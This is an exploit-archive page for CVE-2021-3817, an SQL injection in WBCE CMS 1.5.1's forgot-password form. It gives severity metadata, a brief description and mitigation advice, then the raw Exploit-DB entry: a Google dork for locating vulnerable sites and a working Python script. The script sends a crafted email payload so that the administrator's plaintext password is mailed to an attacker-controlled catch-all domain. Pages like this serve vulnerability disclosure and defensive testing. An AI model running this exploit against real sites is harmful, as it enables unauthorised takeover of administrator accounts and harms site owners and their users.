header-logo
Suggest Exploit
vendor:
WBCE CMS
by:
citril
9.8
CVSS
CRITICAL
Password Reset
89
CWE
Product Name: WBCE CMS
Affected Version From: 1.5.2001
Affected Version To: 1.5.2001
Patch Exists: YES
Related CWE: CVE-2021-3817
CPE: a:wbce:wbce_cms
Metasploit:
Other Scripts:
Platforms Tested: Linux
2021

WBCE CMS 1.5.1 – Admin Password Reset

An attacker can exploit a SQL injection vulnerability in WBCE CMS version 1.5.1 to reset the administrator password. The attacker can send a specially crafted HTTP POST request to the vulnerable URL with the email address set to 'admin@domain.com' and a random value for the submit parameter. This will cause the application to send a plaintext password to the attacker's email address.

Mitigation:

Upgrade to the latest version of WBCE CMS and ensure that all user input is properly sanitized and validated.
Source

Exploit-DB raw data:

# Exploit Title: WBCE CMS 1.5.1 - Admin Password Reset
# Google Dork: intext: "Way Better Content Editing"
# Date: 20/12/2021
# Exploit Author: citril or https://github.com/maxway2021
# Vendor Homepage: https://wbce.org/
# Software Link: https://wbce.org/de/downloads/
# Version: <= 1.5.1
# Tested on: Linux
# CVE : CVE-2021-3817
# Github repo: https://github.com/WBCE/WBCE_CMS
# Writeup: https://medium.com/@citril/cve-2021-3817-from-sqli-to-plaintext-admin-password-recovery-13735773cc75

import requests

_url = 'http://localhost/wbce/admin/login/forgot/index.php' # from mylocalhost environment
_domain = 'pylibs.org' # you have to catch all emails! I used Namecheap domain controller's 'catch all emails and redirect to specific email address' feature

headers = {
    'User-Agent': 'Mozilla/5.0',
    'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
    'Accept-Language': 'en-US,en;q=0.5',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Connection': 'close'
}

_p = "email=%27/**/or/**/user_id=1/**/or/**/'admin%40" + _domain + "&submit=justrandomvalue"

r = requests.post(url = _url, headers = headers, data = _p)
if r.status_code == 200:
    print('[+] Check your email, you are probably going to receive plaintext password which belongs to administrator.')

Navigation

Suggest Exploit

Services By CQR